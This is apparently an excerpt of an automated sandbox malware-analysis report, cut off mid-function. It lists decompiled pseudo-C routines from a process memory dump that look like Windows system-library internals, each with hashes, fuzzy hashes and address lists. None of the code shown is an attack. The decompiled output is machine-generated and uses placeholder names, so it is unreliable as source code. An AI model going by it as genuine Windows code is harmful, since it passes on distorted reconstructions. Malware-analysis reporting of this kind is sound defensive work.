                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                            • Instruction ID: f66a239956f59f6efc6e09189520e58f675a11a3488c514ff31645e5c0f7e603
                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                            • Instruction Fuzzy Hash: 0E01B5B2141509BFE721AF69CD80E62FB6DFF94394F014A35F21482560DB71FCA0CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04984015, Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E04984015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E048D2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E048D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x49a86ac);
					E048BF900(0x49a86d4, _t28);
					E048CFFB0(0x49a86ac, _t28, 0x49a86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E048CFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                            0x0498401a
                                                            0x0498401e
                                                            0x04984023
                                                            0x04984028
                                                            0x04984029
                                                            0x0498402b
                                                            0x0498402f
                                                            0x04984043
                                                            0x04984046
                                                            0x04984051
                                                            0x04984057
                                                            0x0498405f
                                                            0x04984062
                                                            0x04984067
                                                            0x0498406f
                                                            0x0498407c
                                                            0x0498407c
                                                            0x0498408c
                                                            0x0498408c
                                                            0x04984097

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73ec31c26b9258793abff6b4f1bea40be34d1f1caf7e7cdf5bdcb3407c3244d4
                                                            • Instruction ID: 9585743a33d9a67d32ccab12dd3677a9436d84f28976013fc5cd3b35f45d9e93
                                                            • Opcode Fuzzy Hash: 73ec31c26b9258793abff6b4f1bea40be34d1f1caf7e7cdf5bdcb3407c3244d4
                                                            • Instruction Fuzzy Hash: 1C015A72202A457FE711AF6DCD80E13F7ACEF45668B000B29B608C3A51DB64FC118AE5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 049714FB, Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E049714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x49ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E048FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E048D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                            0x049714fb
                                                            0x049714fb
                                                            0x0497150a
                                                            0x04971514
                                                            0x04971519
                                                            0x0497151b
                                                            0x04971526
                                                            0x0497152c
                                                            0x04971534
                                                            0x04971537
                                                            0x0497153a
                                                            0x04971545
                                                            0x04971557
                                                            0x04971547
                                                            0x04971550
                                                            0x04971550
                                                            0x04971562
                                                            0x04971563
                                                            0x04971565
                                                            0x0497156a
                                                            0x0497157f

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc79f072162fd6c0a6341ce09b644d02d4723f3354723643391620329ddd8e42
                                                            • Instruction ID: db6ab20231513ec24f97359d6d8248216cffc7ac9d1997346c37fe802f9f3ea7
                                                            • Opcode Fuzzy Hash: fc79f072162fd6c0a6341ce09b644d02d4723f3354723643391620329ddd8e42
                                                            • Instruction Fuzzy Hash: B2019271A01248AFDB04DF6DD842EAEBBB8EF44714F404566FA05EB380DA74EA50CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0497138A, Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E0497138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x49ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E048FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E048D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                            0x0497138a
                                                            0x0497138a
                                                            0x04971399
                                                            0x049713a3
                                                            0x049713a8
                                                            0x049713aa
                                                            0x049713b5
                                                            0x049713bb
                                                            0x049713c3
                                                            0x049713c6
                                                            0x049713c9
                                                            0x049713d4
                                                            0x049713e6
                                                            0x049713d6
                                                            0x049713df
                                                            0x049713df
                                                            0x049713f1
                                                            0x049713f2
                                                            0x049713f4
                                                            0x049713f9
                                                            0x0497140e

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd612c2fdeb3423ee5dd97369e59109dd93fde7e6beee8af36629cd7be6559e0
                                                            • Instruction ID: 375c6d0599b4c379b5854be5aa556e273c5bf08c793aaae5f1b840c5d47be5c6
                                                            • Opcode Fuzzy Hash: cd612c2fdeb3423ee5dd97369e59109dd93fde7e6beee8af36629cd7be6559e0
                                                            • Instruction Fuzzy Hash: 85019671E01208AFDB04DFA9D841FAEB7B8EF44714F004566F900EB340D674AA50C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048CB02A, Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048CB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E048D7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04937016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                            0x048cb037
                                                            0x048cb039
                                                            0x048cb03b
                                                            0x048cb040
                                                            0x0491a60e
                                                            0x00000000
                                                            0x00000000
                                                            0x0491a61d
                                                            0x048cb04b
                                                            0x048cb04e
                                                            0x0491a627
                                                            0x0491a634
                                                            0x00000000
                                                            0x00000000
                                                            0x0491a641
                                                            0x0491a653
                                                            0x0491a643
                                                            0x0491a64c
                                                            0x0491a64c
                                                            0x0491a65b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0491a66c
                                                            0x048cb057
                                                            0x048cb057
                                                            0x048cb057
                                                            0x048cb046
                                                            0x048cb046
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                            • Instruction ID: cf6fd552988edb86a5423a4ad375c3e44dcba51def225ce53057909f51d131dc
                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                            • Instruction Fuzzy Hash: EC01BC322029889FD322DB5CD988F6677DCEB41794F0904B5F919CBA61E638FC40D624
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04981074, Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E04981074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0498165E(__ebx, 0x49a8ae4, (__edx -  *0x49a8b04 >> 0x14) + (__edx -  *0x49a8b04 >> 0x14), __edi, __ecx, (__edx -  *0x49a8b04 >> 0x14) + (__edx -  *0x49a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0497AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E048D7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0496FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                            0x04981074
                                                            0x04981080
                                                            0x04981082
                                                            0x0498108a
                                                            0x0498108f
                                                            0x04981093
                                                            0x049810ab
                                                            0x049810ab
                                                            0x049810c3
                                                            0x049810cf
                                                            0x049810e1
                                                            0x049810d1
                                                            0x049810da
                                                            0x049810da
                                                            0x049810e9
                                                            0x049810f5
                                                            0x049810f5
                                                            0x049810fe

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 221c27e3123b050e61343f15c8659b614f765267b10f957e4e85945902db9bed
                                                            • Instruction ID: cf419b02906e3125c025767c84e1a0faa353ca117402aca02ad5af7a109ffdb0
                                                            • Opcode Fuzzy Hash: 221c27e3123b050e61343f15c8659b614f765267b10f957e4e85945902db9bed
                                                            • Instruction Fuzzy Hash: 1D01F1726047419FD711EF68C805B1A7BE9ABC4318F048A39F88693690EE34F855CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0496FEC0, Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E0496FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x49ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E048FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E048D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                            0x0496fec0
                                                            0x0496fec0
                                                            0x0496fecf
                                                            0x0496fed9
                                                            0x0496fede
                                                            0x0496fee0
                                                            0x0496feeb
                                                            0x0496fef3
                                                            0x0496fef6
                                                            0x0496fef9
                                                            0x0496ff04
                                                            0x0496ff16
                                                            0x0496ff06
                                                            0x0496ff0f
                                                            0x0496ff0f
                                                            0x0496ff21
                                                            0x0496ff22
                                                            0x0496ff24
                                                            0x0496ff29
                                                            0x0496ff3e

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7acd44ec2825b666ffe2b6119de55a415d0b1d05f7e579d9abe4e5254f4df598
                                                            • Instruction ID: 3f0fedc549a71b11f9bce48b0bfbb8b10027c2f2149ee79bd6e2d3e75658dd91
                                                            • Opcode Fuzzy Hash: 7acd44ec2825b666ffe2b6119de55a415d0b1d05f7e579d9abe4e5254f4df598
                                                            • Instruction Fuzzy Hash: 6D01D871E01208ABD714DB69D845FAFB7B8EF45704F004566FA01DB380EA74A910C795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0496FE3F, Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E0496FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x49ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E048FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E048D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                            0x0496fe3f
                                                            0x0496fe3f
                                                            0x0496fe4e
                                                            0x0496fe58
                                                            0x0496fe5d
                                                            0x0496fe5f
                                                            0x0496fe6a
                                                            0x0496fe72
                                                            0x0496fe75
                                                            0x0496fe78
                                                            0x0496fe83
                                                            0x0496fe95
                                                            0x0496fe85
                                                            0x0496fe8e
                                                            0x0496fe8e
                                                            0x0496fea0
                                                            0x0496fea1
                                                            0x0496fea3
                                                            0x0496fea8
                                                            0x0496febd

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb84561eead7e5ca46cffdcde06c39bca1e0b96299612bb8b31f129d9e66f48a
                                                            • Instruction ID: 3db93604fc4c3e41c464c0159f83b588c12d42a3e535f65c5f3b8b9fde3abdd6
                                                            • Opcode Fuzzy Hash: eb84561eead7e5ca46cffdcde06c39bca1e0b96299612bb8b31f129d9e66f48a
                                                            • Instruction Fuzzy Hash: 9F01D471E01208ABDB14DFADD805FAEBBB8EF40704F004566FA01EB380DA74A910C795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04988ED6, Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E04988ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x49ad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E048D7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                            0x04988ed6
                                                            0x04988ee5
                                                            0x04988eed
                                                            0x04988ef0
                                                            0x04988efa
                                                            0x04988f03
                                                            0x04988f0c
                                                            0x04988f15
                                                            0x04988f24
                                                            0x04988f27
                                                            0x04988f31
                                                            0x04988f43
                                                            0x04988f33
                                                            0x04988f3c
                                                            0x04988f3c
                                                            0x04988f4e
                                                            0x04988f4f
                                                            0x04988f51
                                                            0x04988f56
                                                            0x04988f69

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f3d0b993b53d832e0af1cf1c8e5df6df27f3833551e72f9a3a787329e267eff
                                                            • Instruction ID: f7a2cb70bb59c5346f2ad9e3d387c97b10aa936d1bfbba88348fdfc6675cadc0
                                                            • Opcode Fuzzy Hash: 7f3d0b993b53d832e0af1cf1c8e5df6df27f3833551e72f9a3a787329e267eff
                                                            • Instruction Fuzzy Hash: 86110070E012499FD704EFA9D441BAEB7F4FF08304F4446BAE519EB742E674A940CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04988A62, Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E04988A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x49ad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E048D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048FB640(E048F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                            0x04988a62
                                                            0x04988a71
                                                            0x04988a79
                                                            0x04988a82
                                                            0x04988a85
                                                            0x04988a89
                                                            0x04988a8c
                                                            0x04988a8f
                                                            0x04988a92
                                                            0x04988a95
                                                            0x04988a9f
                                                            0x04988ab1
                                                            0x04988aa1
                                                            0x04988aaa
                                                            0x04988aaa
                                                            0x04988abc
                                                            0x04988abd
                                                            0x04988abf
                                                            0x04988ac4
                                                            0x04988ada

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9845f74fcb8fb37560379d80a753f78af4f30ff7d34db5e96ffba83e7763838d
                                                            • Instruction ID: 53f0792a52ec2861860037fee3e91188cebb559e435a1f8528b8a3fca0634351
                                                            • Opcode Fuzzy Hash: 9845f74fcb8fb37560379d80a753f78af4f30ff7d34db5e96ffba83e7763838d
                                                            • Instruction Fuzzy Hash: 57012171A0121C9FDB04EFADD9419AEB7B8EF48314F50456AF905E7341D674A910CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BDB60, Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048BDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E048BDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E048BE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L048BE8B0(__ecx, _t14, 0xfff);
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                            0x048bdb64
                                                            0x048bdb66
                                                            0x048bdb6b
                                                            0x048bdbaa
                                                            0x048bdb71
                                                            0x048bdb76
                                                            0x048bdb7a
                                                            0x048bdba3
                                                            0x048bdb7c
                                                            0x048bdb87
                                                            0x048bdb8b
                                                            0x04914fa1
                                                            0x04914fb3
                                                            0x04914fb8
                                                            0x048bdb91
                                                            0x048bdb96
                                                            0x048bdb98
                                                            0x048bdb98
                                                            0x048bdb8b
                                                            0x048bdb7a
                                                            0x048bdb9d
                                                            0x048bdba2

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                            • Instruction ID: d84a782c45d9d4c6c513caccfe95c41a27b4dc0ab17012d70d429517eccd1d6e
                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                            • Instruction Fuzzy Hash: 33F04C33201926AFE7321A5988C0FE7B6D58FC1B64F150E35F145DB344CEA4AC0296D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BB1E1, Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E048D7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E048D7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04937016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                            0x048bb1e8
                                                            0x048bb1ea
                                                            0x048bb1f3
                                                            0x04914a17
                                                            0x048bb1f9
                                                            0x048bb1f9
                                                            0x048bb1f9
                                                            0x048bb201
                                                            0x04914a21
                                                            0x04914a2e
                                                            0x00000000
                                                            0x00000000
                                                            0x04914a3b
                                                            0x04914a4d
                                                            0x04914a3d
                                                            0x04914a46
                                                            0x04914a46
                                                            0x04914a55
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048bb20a
                                                            0x048bb20a
                                                            0x048bb20a
                                                            0x048bb20a

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                            • Instruction ID: ec72e7b3e3fb5ce161c4f8f8d91ce3e3c7832dd687bfd8242cd22e0f214d44a5
                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                            • Instruction Fuzzy Hash: E101D1326016889FD322975DC804FA97B99EF86758F0948B2F954CBBB1E778F800C255
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0494FE87, Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E0494FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x49ad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E048D7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
